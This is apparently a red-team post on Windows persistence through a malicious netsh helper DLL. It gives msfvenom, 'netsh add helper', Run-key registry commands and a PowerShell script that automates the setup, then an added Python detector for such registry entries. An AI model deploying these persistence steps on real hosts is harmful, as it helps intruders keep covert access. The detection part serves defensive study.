
netsh backdoor


This Wind


Netsh is a Windows utility that administrators use to perform tasks related to the system's network configuration and to make changes to the host-based Windows Firewall. Netsh's functionality can be extended with DLL files. This feature lets red teams use the tool to load an arbitrary DLL, achieving code execution and therefore persistence. However, implementing this technique requires local administrator privileges.

Generate a DLL with msfvenom

msfvenom -p windows/x64/exec CMD=calc.exe -f dll > test.dll


Run on the victim machine

netsh add helper <DLL_PATH>


After that, the DLL is loaded as soon as netsh runs (netsh is launched automatically once the DLL has been loaded; after it is closed, every netsh invocation from then on loads the DLL).

To have netsh run automatically at system startup, the registry Run key has to be modified (the first line below uses reg.exe from a Windows shell; the second is the equivalent Meterpreter `reg setval` command):

 reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Windows\SysWOW64\netsh";
 reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run\\ -v pentestlab -d 'C:\Windows\SysWOW64\netsh';

Here I implemented a simple version of this in PowerShell

 param (
    [string]$path = "NULL"
 )
 if ($path -eq "NULL") {
    Write-Host "netsh.ps1 -path <DLL_path>";
    exit 0;
 } else {
    Write-Host "[*] reboot run netsh";
    # Run key: launch netsh (and therefore the registered helper DLL) at logon
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Windows\SysWOW64\netsh";
    # `reg setval` is a Meterpreter command, not a reg.exe subcommand, so it is not used here
    # register the DLL as a netsh helper
    netsh add helper $path;
 }
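As an added detection example (not from the original post, and not the post's PowerShell), the Python below flags both halves of this technique in `reg query` style output: a helper DLL registered under HKLM\SOFTWARE\Microsoft\NetSh that is not a bare System32 DLL name, and a Run-key entry that launches netsh. The registry key paths are real; the sample value data is constructed to mirror the test.dll scenario.

```python
"""Added triage check (not from the post): flag netsh helper DLL persistence in
`reg query` style text, so it runs offline against a registry export.
Key paths are real; the value data is constructed to mirror the test.dll scenario."""
import re

# Constructed sample output of: reg query HKLM\SOFTWARE\Microsoft\NetSh
SAMPLE_NETSH_KEY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh
    ifmon    REG_SZ    ifmon.dll
    fwcfg    REG_SZ    fwcfg.dll
    test    REG_SZ    C:\Users\Public\test.dll
"""
# Constructed sample output of: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
SAMPLE_RUN_KEY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    Pentestlab    REG_SZ    C:\Windows\SysWOW64\netsh
"""

def parse_reg_query(text: str) -> dict:
    """Map value name -> data; reg query separates the three columns with 4 spaces."""
    values = {}
    for line in text.splitlines():
        parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)
        if len(parts) == 3 and parts[1].startswith("REG_"):
            values[parts[0]] = parts[2]
    return values

def suspicious_netsh_helpers(values: dict) -> list:
    """`netsh add helper` stores the DLL string as given. Built-in helpers are bare
    DLL names resolved from System32, so a directory component or a non-.dll
    extension is a strong signal of a manually registered helper."""
    return [(n, d) for n, d in values.items()
            if "\\" in d or "/" in d or not d.lower().endswith(".dll")]

def netsh_autoruns(values: dict) -> list:
    """Run-key entries whose command is netsh; a legitimate autorun does not need it."""
    pat = re.compile(r"(^|\\)netsh(\.exe)?(\s|$)", re.IGNORECASE)
    return [(n, d) for n, d in values.items() if pat.search(d.strip('"'))]

if __name__ == "__main__":
    for name, data in suspicious_netsh_helpers(parse_reg_query(SAMPLE_NETSH_KEY)):
        print(f"[!] unexpected netsh helper {name!r}: {data}")
    for name, data in netsh_autoruns(parse_reg_query(SAMPLE_RUN_KEY)):
        print(f"[!] netsh launched from Run key {name!r}: {data}")
```

On a live host the same two functions can be fed the real output of `reg query` for those keys; any hit should be followed by checking the DLL's signature and creation time.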

